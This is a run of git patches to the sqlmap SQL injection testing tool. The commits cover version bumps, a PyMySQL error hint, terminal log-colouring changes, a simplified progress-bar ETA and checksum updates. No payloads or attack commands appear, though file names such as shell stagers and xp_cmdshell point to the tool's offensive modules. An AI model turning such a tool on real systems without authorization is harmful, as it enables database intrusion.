0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -97ba609b383bae160c47d4b10b9f06a0 lib/core/settings.py +0354f951a0f4711218323e16d32aa56f lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py From a424e4ab599cd80fd6ea54e828f2d72c7c4f2a9d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 2 Jul 2018 13:09:25 +0200 Subject: [PATCH 195/428] Fixes #3168 --- lib/core/settings.py | 2 +- sqlmap.py | 6 ++++++ txt/checksum.md5 | 4 ++-- 3 files changed, 9 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 38beabae9b3..de16dd5f473 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.3" +VERSION = "1.2.7.4" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/sqlmap.py b/sqlmap.py index 98e5eeeaeb1..f64e5e9ff84 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -273,6 +273,12 @@ def main(): logger.error(errMsg) raise SystemExit + elif all(_ in excMsg for _ in ("scramble_caching_sha2", "TypeError")): + errMsg = "please downgrade the 'PyMySQL' package (=< 0.8.1) " + errMsg += "(Reference: https://github.com/PyMySQL/PyMySQL/issues/700)" + logger.error(errMsg) + raise SystemExit + elif "must be pinned buffer, not bytearray" in excMsg: errMsg = "error occurred at Python interpreter which " errMsg += "is fixed in 2.7.x. Please update accordingly " diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9428342ee01..b5a0c6d5800 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -0354f951a0f4711218323e16d32aa56f lib/core/settings.py +af78e555614c7e1bf89c37271831b486 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py @@ -226,7 +226,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ 4eaeef94314956e4517e5310a28d579a sqlmapapi.py -e59b4cba325d0e5184dce300ef052728 sqlmap.py +a35b5b83c12841fdf3925190c9d24299 sqlmap.py 1a1e3a78ded58b240c9dbb1b17996acf tamper/0x2char.py 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py From 57be1856a6abdcdea6bdd289e0f0f6a8121046bc Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 5 Jul 2018 14:01:43 +0200 Subject: [PATCH 196/428] Where things could go kaboom (changing terminal coloring) --- lib/core/common.py | 6 +----- lib/core/settings.py | 2 +- thirdparty/ansistrm/ansistrm.py | 35 +++++++++++++++++++++++++++------ txt/checksum.md5 | 6 +++--- 4 files changed, 34 insertions(+), 15 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index d747a42ef80..f060039e6c9 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -884,11 +884,7 @@ def setColor(message, bold=False): retVal = colored(message, color=None, on_color=None, attrs=("bold",)) elif level: level = getattr(logging, level, None) if isinstance(level, basestring) else level - _ = LOGGER_HANDLER.level_map.get(level) - if _: - background, foreground, bold = _ - retVal = colored(message, color=foreground, on_color="on_%s" % background if background else None, attrs=("bold",) if bold else None) - + retVal = LOGGER_HANDLER.colorize(message, level) kb.stickyLevel = level if message and message[-1] != "\n" else None return retVal diff --git a/lib/core/settings.py b/lib/core/settings.py index de16dd5f473..873a5efc8ca 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.4" +VERSION = "1.2.7.5" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/thirdparty/ansistrm/ansistrm.py b/thirdparty/ansistrm/ansistrm.py index 9f3a6c5ec82..5ecc0596123 100644 --- a/thirdparty/ansistrm/ansistrm.py +++ b/thirdparty/ansistrm/ansistrm.py @@ -1,6 +1,8 @@ # # Copyright (C) 2010-2012 Vinay Sajip. All rights reserved. Licensed under the new BSD license. +# (Note: 2018 modifications by @stamparm) # + import logging import os import re @@ -127,9 +129,9 @@ def output_colorized(self, message): ctypes.windll.kernel32.SetConsoleTextAttribute(h, color) - def colorize(self, message, record): - if record.levelno in self.level_map and self.is_tty: - bg, fg, bold = self.level_map[record.levelno] + def colorize(self, message, levelno): + if levelno in self.level_map and self.is_tty: + bg, fg, bold = self.level_map[levelno] params = [] if bg in self.color_map: @@ -148,11 +150,32 @@ def colorize(self, message, record): else: prefix = "" - message = "%s%s" % (prefix, ''.join((self.csi, ';'.join(params), - 'm', message, self.reset))) + match = re.search(r"\[([A-Z]+)\]", message) + if match: + level = match.group(1) + if message.startswith("\x1b[1m"): + message = message.replace("\x1b[1m", "") + reset = self.reset + "\x1b[1m" + params.append('1') + else: + reset = self.reset + message = message.replace(level, ''.join((self.csi, ';'.join(params), 'm', level, reset)), 1) + else: + message = "%s%s" % (prefix, ''.join((self.csi, ';'.join(params), 'm', message, self.reset))) + + match = re.search(r"\A\s*\[([\d:]+)\]", message) + if match: + time = match.group(1) + if not message.endswith(self.reset): + reset = self.reset + elif message.startswith("\x1b[1m"): # bold + reset = self.reset + "\x1b[1m" + else: + reset = self.reset + message = message.replace(time, ''.join((self.csi, str(self.color_map["cyan"] + 30), 'm', time, reset)), 1) return message def format(self, record): message = logging.StreamHandler.format(self, record) - return self.colorize(message, record) + return self.colorize(message, record.levelno) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b5a0c6d5800..467d7de28d9 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -6c3ba41569f9403aef6cd9312fe9b96e lib/core/common.py +ab2f7ecb7d3dff9afd05675031942e8e lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -af78e555614c7e1bf89c37271831b486 lib/core/settings.py +9f27c2f2abae2c21eb623f16abfeccf9 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py @@ -285,7 +285,7 @@ fd1bff6caefe5007444f7a0fabbc8ce9 tamper/space2mysqlblank.py 929a2586dbb7b758a454eb09e13e5a73 tamper/versionedkeywords.py 3aff4d344ebd4f38e033e73b63f84447 tamper/versionedmorekeywords.py ed1acafbac707bfa71c72f76b81c1bdd tamper/xforwardedfor.py -368165b45dadcdff4422bc010700832a thirdparty/ansistrm/ansistrm.py +b743632abd4eee8654f98dcfdb753246 thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py cb2e1fe7c404dff41a2ae9132828f532 thirdparty/beautifulsoup/__init__.py From 4ecf6eee05e8ed844b596d97bdc300a33b972540 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 5 Jul 2018 14:21:32 +0200 Subject: [PATCH 197/428] Minor style update --- lib/core/settings.py | 2 +- thirdparty/ansistrm/ansistrm.py | 13 ++++++++++++- txt/checksum.md5 | 4 ++-- 3 files changed, 15 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 873a5efc8ca..d55e241ec8c 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.5" +VERSION = "1.2.7.6" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/thirdparty/ansistrm/ansistrm.py b/thirdparty/ansistrm/ansistrm.py index 5ecc0596123..02b0b85eb5c 100644 --- a/thirdparty/ansistrm/ansistrm.py +++ b/thirdparty/ansistrm/ansistrm.py @@ -150,7 +150,7 @@ def colorize(self, message, levelno): else: prefix = "" - match = re.search(r"\[([A-Z]+)\]", message) + match = re.search(r"\[([A-Z ]+)\]", message) if match: level = match.group(1) if message.startswith("\x1b[1m"): @@ -174,6 +174,17 @@ def colorize(self, message, levelno): reset = self.reset message = message.replace(time, ''.join((self.csi, str(self.color_map["cyan"] + 30), 'm', time, reset)), 1) + match = re.search(r"\[(#\d+)\]", message) + if match: + counter = match.group(1) + if not message.endswith(self.reset): + reset = self.reset + elif message.startswith("\x1b[1m"): # bold + reset = self.reset + "\x1b[1m" + else: + reset = self.reset + message = message.replace(counter, ''.join((self.csi, str(self.color_map["yellow"] + 30), 'm', counter, reset)), 1) + return message def format(self, record): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 467d7de28d9..87116f163aa 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9f27c2f2abae2c21eb623f16abfeccf9 lib/core/settings.py +f1e0cc7708df13f9f973dbcabfd77007 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py @@ -285,7 +285,7 @@ fd1bff6caefe5007444f7a0fabbc8ce9 tamper/space2mysqlblank.py 929a2586dbb7b758a454eb09e13e5a73 tamper/versionedkeywords.py 3aff4d344ebd4f38e033e73b63f84447 tamper/versionedmorekeywords.py ed1acafbac707bfa71c72f76b81c1bdd tamper/xforwardedfor.py -b743632abd4eee8654f98dcfdb753246 thirdparty/ansistrm/ansistrm.py +2350c4ab8a9972980ad93466066294e9 thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py cb2e1fe7c404dff41a2ae9132828f532 thirdparty/beautifulsoup/__init__.py From b44551230ed018e5654035cf99a150e214aac965 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 5 Jul 2018 15:13:51 +0200 Subject: [PATCH 198/428] Fixes #3165 --- lib/core/settings.py | 2 +- lib/techniques/blind/inference.py | 6 +++--- lib/techniques/error/use.py | 2 +- lib/techniques/union/use.py | 4 ++-- lib/utils/progress.py | 34 +++++++++++++++---------------- txt/checksum.md5 | 10 ++++----- 6 files changed, 28 insertions(+), 30 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index d55e241ec8c..a0f2325c0d3 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.6" +VERSION = "1.2.7.7" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py index e08c5b6c627..2ed93597b2c 100644 --- a/lib/techniques/blind/inference.py +++ b/lib/techniques/blind/inference.py @@ -485,7 +485,7 @@ def blindThread(): if kb.threadContinue: if showEta: - progress.progress(calculateDeltaSeconds(start), threadData.shared.index[0]) + progress.progress(threadData.shared.index[0]) elif conf.verbose >= 1: startCharIndex = 0 endCharIndex = 0 @@ -578,7 +578,7 @@ def blindThread(): # Did we have luck? if result: if showEta: - progress.progress(calculateDeltaSeconds(start), len(commonValue)) + progress.progress(len(commonValue)) elif conf.verbose in (1, 2) or conf.api: dataToStdout(filterControlChars(commonValue[index - 1:])) @@ -628,7 +628,7 @@ def blindThread(): threadData.shared.value = partialValue = partialValue + val if showEta: - progress.progress(calculateDeltaSeconds(start), index) + progress.progress(index) elif conf.verbose in (1, 2) or conf.api: dataToStdout(filterControlChars(val)) diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py index 495fac78a22..6aac89350ef 100644 --- a/lib/techniques/error/use.py +++ b/lib/techniques/error/use.py @@ -419,7 +419,7 @@ def errorThread(): with kb.locks.value: index = None if threadData.shared.showEta: - threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) + threadData.shared.progress.progress(threadData.shared.counter) for index in xrange(1 + len(threadData.shared.buffered)): if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num: break diff --git a/lib/techniques/union/use.py b/lib/techniques/union/use.py index 8d69f9c9b5c..30c986d4b41 100644 --- a/lib/techniques/union/use.py +++ b/lib/techniques/union/use.py @@ -333,7 +333,7 @@ def unionThread(): items = parseUnionPage(output) if threadData.shared.showEta: - threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) + threadData.shared.progress.progress(threadData.shared.counter) if isListLike(items): # in case that we requested N columns and we get M!=N then we have to filter a bit if len(items) > 1 and len(expressionFieldsList) > 1: @@ -355,7 +355,7 @@ def unionThread(): else: index = None if threadData.shared.showEta: - threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) + threadData.shared.progress.progress(threadData.shared.counter) for index in xrange(1 + len(threadData.shared.buffered)): if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num: break diff --git a/lib/utils/progress.py b/lib/utils/progress.py index e1cb4ca668b..1776fb25ade 100644 --- a/lib/utils/progress.py +++ b/lib/utils/progress.py @@ -5,6 +5,8 @@ See the file 'LICENSE' for copying permission """ +import time + from lib.core.common import getUnicode from lib.core.common import dataToStdout from lib.core.data import conf @@ -17,13 +19,12 @@ class ProgressBar(object): def __init__(self, minValue=0, maxValue=10, totalWidth=None): self._progBar = "[]" - self._oldProgBar = "" self._min = int(minValue) self._max = int(maxValue) self._span = max(self._max - self._min, 0.001) self._width = totalWidth if totalWidth else conf.progressWidth self._amount = 0 - self._times = [] + self._start = None self.update() def _convertSeconds(self, value): @@ -52,7 +53,7 @@ def update(self, newAmount=0): percentDone = min(100, int(percentDone)) # Figure out how many hash bars the percentage should be - allFull = self._width - len("100%% [] %s/%s ETA 00:00" % (self._max, self._max)) + allFull = self._width - len("100%% [] %s/%s (ETA 00:00)" % (self._max, self._max)) numHashes = (percentDone / 100.0) * allFull numHashes = int(round(numHashes)) @@ -68,19 +69,18 @@ def update(self, newAmount=0): percentString = getUnicode(percentDone) + "%" self._progBar = "%s %s" % (percentString, self._progBar) - def progress(self, deltaTime, newAmount): + def progress(self, newAmount): """ This method saves item delta time and shows updated progress bar with calculated eta """ - if len(self._times) <= ((self._max * 3) / 100) or newAmount > self._max: + if self._start is None or newAmount > self._max: + self._start = time.time() eta = None else: - midTime = sum(self._times) / len(self._times) - midTimeWithLatest = (midTime + deltaTime) / 2 - eta = midTimeWithLatest * (self._max - newAmount) + delta = time.time() - self._start + eta = (self._max - self._min) * (1.0 * delta / newAmount) - delta - self._times.append(deltaTime) self.update(newAmount) self.draw(eta) @@ -89,15 +89,13 @@ def draw(self, eta=None): This method draws the progress bar if it has changed """ - if self._progBar != self._oldProgBar: - self._oldProgBar = self._progBar - dataToStdout("\r%s %d/%d%s" % (self._progBar, self._amount, self._max, (" ETA %s" % self._convertSeconds(int(eta))) if eta is not None else "")) - if self._amount >= self._max: - if not conf.liveTest: - dataToStdout("\r%s\r" % (" " * self._width)) - kb.prependFlag = False - else: - dataToStdout("\n") + dataToStdout("\r%s %d/%d%s" % (self._progBar, self._amount, self._max, (" (ETA %s)" % (self._convertSeconds(int(eta)) if eta is not None else "??:??")))) + if self._amount >= self._max: + if not conf.liveTest: + dataToStdout("\r%s\r" % (" " * self._width)) + kb.prependFlag = False + else: + dataToStdout("\n") def __str__(self): """ diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 87116f163aa..5fe5616ba7e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -f1e0cc7708df13f9f973dbcabfd77007 lib/core/settings.py +c4439324bd9484f4a35d648a20d7bf87 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py @@ -89,17 +89,17 @@ fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py 48575dde7bb867b7937769f569a98309 lib/takeover/udf.py f6f835e4190a55e42d13c1e7ca3f728f lib/takeover/web.py f1decf0a987bd3a4bc757212cbe6a6c8 lib/takeover/xp_cmdshell.py -4a7f231e597f754e9fcd116d13ad1a4d lib/techniques/blind/inference.py +09beb19c2ec9fdd14329f1c0b59a2d05 lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/dns/__init__.py 799faf9008527d2e9da9d923e50f685a lib/techniques/dns/test.py 48a24f48da791e67309003fd5e8428cb lib/techniques/dns/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/error/__init__.py -f5fb02487edaf9adaa81d54324c84f8f lib/techniques/error/use.py +b9f6148c8df6b9d3316ce082dc1a63dd lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py 94d7a22bb6725a91e84ba2cd9973e96d lib/techniques/union/test.py -11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py +8b770864bdb106ef50c70173c824395c lib/techniques/union/use.py 77ff35587af9e3dfde63b8327e230f9a lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py 31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py @@ -111,7 +111,7 @@ cc1cfe36057f1d9bbdcba1bcc03359f9 lib/utils/hash.py 011d2dbf589e0faa0deca61a651239cc lib/utils/htmlentities.py 1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py 010d8327239d33af4ce9f25683cfc012 lib/utils/pivotdumptable.py -5cb78b0e60fd7fd84502d62cf85d2064 lib/utils/progress.py +683c3bd05b6164f56a57ed495c162684 lib/utils/progress.py 0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py 2c5a655c8e94cbe2664ee497752ac1f2 lib/utils/search.py 571884f530796534f03c49cf3f380a4c lib/utils/sqlalchemy.py From e84142b6a963322dc4acdf7605b374901141686d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 6 Jul 2018 16:18:04 +0200 Subject: [PATCH 199/428] Fixes #3172 --- lib/core/settings.py | 2 +- thirdparty/ansistrm/ansistrm.py | 56 ++++++++++++++++++--------------- txt/checksum.md5 | 4 +-- 3 files changed, 33 insertions(+), 29 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index a0f2325c0d3..2aa98ecb5cc 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.7" +VERSION = "1.2.7.8" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/thirdparty/ansistrm/ansistrm.py b/thirdparty/ansistrm/ansistrm.py index 02b0b85eb5c..c3fc6987f8b 100644 --- a/thirdparty/ansistrm/ansistrm.py +++ b/thirdparty/ansistrm/ansistrm.py @@ -45,6 +45,7 @@ class ColorizingStreamHandler(logging.StreamHandler): } csi = '\x1b[' reset = '\x1b[0m' + bold = "\x1b[1m" disable_coloring = False @property @@ -150,40 +151,43 @@ def colorize(self, message, levelno): else: prefix = "" - match = re.search(r"\[([A-Z ]+)\]", message) + match = re.search(r"\[([A-Z ]+)\]", message) # log level if match: level = match.group(1) - if message.startswith("\x1b[1m"): - message = message.replace("\x1b[1m", "") - reset = self.reset + "\x1b[1m" + if message.startswith(self.bold): + message = message.replace(self.bold, "") + reset = self.reset + self.bold params.append('1') else: reset = self.reset message = message.replace(level, ''.join((self.csi, ';'.join(params), 'm', level, reset)), 1) - else: - message = "%s%s" % (prefix, ''.join((self.csi, ';'.join(params), 'm', message, self.reset))) - match = re.search(r"\A\s*\[([\d:]+)\]", message) - if match: - time = match.group(1) - if not message.endswith(self.reset): - reset = self.reset - elif message.startswith("\x1b[1m"): # bold - reset = self.reset + "\x1b[1m" - else: - reset = self.reset - message = message.replace(time, ''.join((self.csi, str(self.color_map["cyan"] + 30), 'm', time, reset)), 1) + match = re.search(r"\A\s*\[([\d:]+)\]", message) # time + if match: + time = match.group(1) + if not message.endswith(self.reset): + reset = self.reset + elif message.startswith(self.bold): # bold + reset = self.reset + self.bold + else: + reset = self.reset + message = message.replace(time, ''.join((self.csi, str(self.color_map["cyan"] + 30), 'm', time, reset)), 1) + + match = re.search(r"\[(#\d+)\]", message) # counter + if match: + counter = match.group(1) + if not message.endswith(self.reset): + reset = self.reset + elif message.startswith(self.bold): # bold + reset = self.reset + self.bold + else: + reset = self.reset + message = message.replace(counter, ''.join((self.csi, str(self.color_map["yellow"] + 30), 'm', counter, reset)), 1) + else: + message = ''.join((self.csi, ';'.join(params), 'm', message, self.reset)) - match = re.search(r"\[(#\d+)\]", message) - if match: - counter = match.group(1) - if not message.endswith(self.reset): - reset = self.reset - elif message.startswith("\x1b[1m"): # bold - reset = self.reset + "\x1b[1m" - else: - reset = self.reset - message = message.replace(counter, ''.join((self.csi, str(self.color_map["yellow"] + 30), 'm', counter, reset)), 1) + if prefix: + message = "%s%s" % (prefix, message) return message diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 5fe5616ba7e..d5b7b6e9c6b 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -c4439324bd9484f4a35d648a20d7bf87 lib/core/settings.py +21189972adee4e784a2ffad146550749 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py @@ -285,7 +285,7 @@ fd1bff6caefe5007444f7a0fabbc8ce9 tamper/space2mysqlblank.py 929a2586dbb7b758a454eb09e13e5a73 tamper/versionedkeywords.py 3aff4d344ebd4f38e033e73b63f84447 tamper/versionedmorekeywords.py ed1acafbac707bfa71c72f76b81c1bdd tamper/xforwardedfor.py -2350c4ab8a9972980ad93466066294e9 thirdparty/ansistrm/ansistrm.py +0424227a228a2b5b53ad1d6df4240ddd thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py cb2e1fe7c404dff41a2ae9132828f532 thirdparty/beautifulsoup/__init__.py From 558484644a730343fffb469d3cb11b0f8b1edfad Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 6 Jul 2018 16:22:19 +0200 Subject: [PATCH 200/428] Minor refactoring --- lib/core/settings.py | 2 +- thirdparty/ansistrm/ansistrm.py | 7 ++----- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 8 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 2aa98ecb5cc..0a4911b6eb5 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.8" +VERSION = "1.2.7.9" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/thirdparty/ansistrm/ansistrm.py b/thirdparty/ansistrm/ansistrm.py index c3fc6987f8b..1299206c09b 100644 --- a/thirdparty/ansistrm/ansistrm.py +++ b/thirdparty/ansistrm/ansistrm.py @@ -145,11 +145,8 @@ def colorize(self, message, levelno): params.append('1') if params and message: - if message.lstrip() != message: - prefix = re.search(r"\s+", message).group(0) - message = message[len(prefix):] - else: - prefix = "" + match = re.search(r"\A(\s+)", message) + prefix = match.group(1) if match else "" match = re.search(r"\[([A-Z ]+)\]", message) # log level if match: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index d5b7b6e9c6b..1aa07e715ac 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -21189972adee4e784a2ffad146550749 lib/core/settings.py +4c026aa83372dded4cb70cbdb677fb81 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py @@ -285,7 +285,7 @@ fd1bff6caefe5007444f7a0fabbc8ce9 tamper/space2mysqlblank.py 929a2586dbb7b758a454eb09e13e5a73 tamper/versionedkeywords.py 3aff4d344ebd4f38e033e73b63f84447 tamper/versionedmorekeywords.py ed1acafbac707bfa71c72f76b81c1bdd tamper/xforwardedfor.py -0424227a228a2b5b53ad1d6df4240ddd thirdparty/ansistrm/ansistrm.py +641fc9d8f1f8ccb4488f717668422c21 thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py cb2e1fe7c404dff41a2ae9132828f532 thirdparty/beautifulsoup/__init__.py From 7b705b94e3c560dc0b37648a7127a73e2edae2c0 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 9 Jul 2018 12:20:18 +0200 Subject: [PATCH 201/428] Fixes #3171 --- lib/core/settings.py | 2 +- lib/utils/hash.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 0a4911b6eb5..c4144f9020b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from 